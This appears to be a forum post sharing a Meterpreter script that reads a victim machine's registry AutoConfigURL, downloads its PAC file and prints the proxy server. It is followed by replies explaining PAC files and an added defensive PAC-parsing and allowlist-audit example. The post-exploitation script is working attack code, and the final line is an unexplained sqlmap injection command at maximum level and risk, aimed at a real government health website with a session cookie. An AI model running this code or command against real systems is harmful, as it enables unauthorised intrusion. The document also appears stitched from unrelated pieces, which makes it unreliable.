The following Meterpreter script is an example of reading the proxy auto-config (PAC) file to check which proxy servers the compromised machine is using.
Tested on Windows XP only.
```ruby
# This is just a concept of reading the pac file from the compromised machine.
# You can take the stuff ahead from here :-)
# oldmanlab@gmail.com

# Variable initialization
session = client

if session.platform =~ /win32|win64/
  # Read the key and get the AutoConfig URL
  open_key = session.sys.registry.open_key(HKEY_CURRENT_USER,
    'Software\Microsoft\Windows\CurrentVersion\Internet Settings', KEY_READ)
  begin
    url = open_key.query_value('AutoConfigURL').data
    print_status('Reading pac file.....')

    # Download the pac file with URLDownloadToFileW from urlmon.dll via railgun
    session.railgun.add_dll('urlmon', 'urlmon')
    session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD',
      [['PBLOB',  'pCaller',    'in'],
       ['PWCHAR', 'szURL',      'in'],
       ['PWCHAR', 'szFileName', 'in'],
       ['DWORD',  'dwReserved', 'in'],
       ['PBLOB',  'lpfnCB',     'inout']])
    session.railgun.urlmon.URLDownloadToFileW(nil, url, 'proxy.pac', 0, nil)

    # Read the file and search for the proxy servers
    proxy_data = ''
    temp = session.fs.file.new('proxy.pac', 'rb')
    until temp.eof?
      proxy_data << temp.read
    end
    temp.close

    # Only the first PROXY directive is picked up by this regex
    match = proxy_data.match(/PROXY(.*)";/)
    if match
      print_status('The proxy server is:' + match[1])
    else
      print_status('No PROXY directive found in pac file')
    end
  rescue
    print_status('No pac file found')
  ensure
    open_key.close
  end
else
  print_status('Victim is not using Windows')
end
```
I never coded in Ruby before, so any suggestions are welcome.
What do you mean by PAC files? Could you explain?
A PAC file is used by Firefox or IE (Chrome etc.) for dynamically assigning proxy servers for certain domains. As an example, if the domain matches *.somewebsitename.com then it should go through the proxy, else the other domain should access the internet directly blah blah... Much like the FoxyProxy Firefox addon's URL pattern feature.
As a sample PAC file, check this: http://www.symantec.com/business/support/index?page=content&id=HOWTO54198
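As an added example (not part of the original post or its script), here is a small Ruby parser for the directives that a PAC file's FindProxyForURL returns. It collects every PROXY, SOCKS and DIRECT entry from every return statement instead of only the first PROXY match, and adds an allowlist check an administrator can run over their own PAC file to spot a proxy host that should not be there. The PAC text, hostnames and function names below are constructed for this example.

```ruby
# Added example: parse proxy directives out of a PAC file and audit them.
# SAMPLE_PAC is a constructed PAC file, not one taken from any real deployment.
SAMPLE_PAC = <<~'PAC'
  function FindProxyForURL(url, host) {
    // internal hosts go direct
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
      return "DIRECT";
    if (shExpMatch(host, "*.partner.example"))
      return 'PROXY proxy-a.corp.example:8080; PROXY proxy-b.corp.example:8080; DIRECT';
    return "SOCKS5 socks.corp.example:1080; DIRECT";
  }
PAC

# Returns one hash per directive, e.g. {type: "PROXY", host: "proxy-a.corp.example", port: 8080}.
# DIRECT entries are kept with host and port set to nil so the full routing policy is visible.
def parse_pac_directives(pac_text)
  directives = []
  # Match the string literal of every `return "..."` or `return '...'` (either quote style).
  pac_text.scan(/return\s+(["'])(.*?)\1/m) do |_quote, body|
    body.split(";").each do |entry|
      entry = entry.strip
      next if entry.empty?
      type, endpoint = entry.split(/\s+/, 2)
      type = type.upcase
      if type == "DIRECT"
        directives << { type: "DIRECT", host: nil, port: nil }
      else
        host, port = endpoint.to_s.split(":", 2)
        directives << { type: type, host: host, port: port ? port.to_i : nil }
      end
    end
  end
  directives
end

# Unique proxy hosts (DIRECT excluded), in order of first appearance.
def proxy_hosts(pac_text)
  parse_pac_directives(pac_text).map { |d| d[:host] }.compact.uniq
end

# Audit check: any proxy host not on the expected allowlist is worth investigating,
# since a tampered PAC file or AutoConfigURL silently reroutes browser traffic.
def unexpected_proxies(pac_text, allowed_hosts)
  proxy_hosts(pac_text) - allowed_hosts
end

if __FILE__ == $0
  puts "Proxy hosts: #{proxy_hosts(SAMPLE_PAC).inspect}"
  allowed = ["proxy-a.corp.example", "proxy-b.corp.example"]
  puts "Unexpected: #{unexpected_proxies(SAMPLE_PAC, allowed).inspect}"
end
```

Run against the constructed file, proxy_hosts returns the two PROXY hosts and the SOCKS5 host, and unexpected_proxies flags socks.corp.example because it is not on the allowlist. The regex in the post's script would have returned only " proxy-a.corp.example:8080" and would miss a PAC file that uses single quotes.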
./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://bvsms2.saude.gov.br' --data="id=5&text=dummy" --level=5 risk=3 -p id --suffix="BR" -v3